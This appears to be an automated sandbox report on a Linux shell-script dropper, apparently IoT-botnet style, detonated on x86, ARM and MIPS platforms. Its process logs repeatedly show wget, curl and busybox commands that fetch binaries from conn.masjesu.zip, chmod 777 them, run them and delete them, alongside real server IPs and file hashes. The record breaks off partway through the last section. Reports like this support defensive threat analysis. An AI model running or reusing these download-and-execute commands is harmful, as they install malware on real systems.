Malware Analysis Report

2025-05-06 04:16

Sample ID 241025-bkg9bazhmk
Target 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
SHA256 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912

Threat Level: Shows suspicious behavior

The file 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:12

Reported

2024-10-25 01:14

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh

[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
GB 195.181.164.19:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:12

Reported

2024-10-25 01:14

Platform

debian9-armhf-20240729-en

Max time kernel

148s

Max time network

3s

Command Line

[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh

[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:12

Reported

2024-10-25 01:15

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

155s

Command Line

[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH N/A
N/A /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h N/A
N/A /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM N/A
N/A /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd N/A
N/A /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM N/A
N/A /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI N/A
N/A /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG N/A
N/A /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B N/A
N/A /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg N/A
N/A /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj N/A
N/A /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy N/A
N/A /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /usr/bin/curl N/A
File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /usr/bin/curl N/A
File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /usr/bin/curl N/A
File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /usr/bin/curl N/A
File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /usr/bin/curl N/A
File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /usr/bin/curl N/A
File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /usr/bin/curl N/A
File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /usr/bin/curl N/A
File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /usr/bin/curl N/A
File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /usr/bin/curl N/A
File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /usr/bin/curl N/A
File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /usr/bin/curl N/A

Processes

/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh

[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/chmod

[chmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH

[./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/bin/rm

[rm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/chmod

[chmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h

[./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/bin/rm

[rm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/chmod

[chmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM

[./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/bin/rm

[rm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/chmod

[chmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd

[./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/bin/rm

[rm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/chmod

[chmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM

[./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/bin/rm

[rm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/chmod

[chmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI

[./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/bin/rm

[rm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/chmod

[chmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG

[./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/bin/rm

[rm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/chmod

[chmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B

[./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/bin/rm

[rm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/chmod

[chmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg

[./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/bin/rm

[rm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/chmod

[chmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj

[./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/bin/rm

[rm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/chmod

[chmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy

[./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/bin/rm

[rm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/chmod

[chmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc

[./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/bin/rm

[rm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:12

Reported

2024-10-25 01:14

Platform

debian9-mipsel-20240418-en

Max time kernel

103s

Max time network

105s

Command Line

[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH N/A
N/A /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h N/A
N/A /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM N/A
N/A /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd N/A
N/A /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM N/A
N/A /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI N/A
N/A /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG N/A
N/A /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B N/A
N/A /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg N/A
N/A /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj N/A
N/A /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy N/A
N/A /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc N/A
N/A /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 N/A
N/A /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw N/A
N/A /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd N/A
N/A /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM N/A
N/A /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI N/A
N/A /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG N/A
N/A /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj N/A
N/A /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy N/A
N/A /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc N/A
N/A /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 N/A
N/A /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B N/A
N/A /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg N/A
N/A /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw N/A
N/A /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH N/A
N/A /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h N/A
N/A /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM N/A

Reads runtime system information

discovery
Description Indicator Process Target
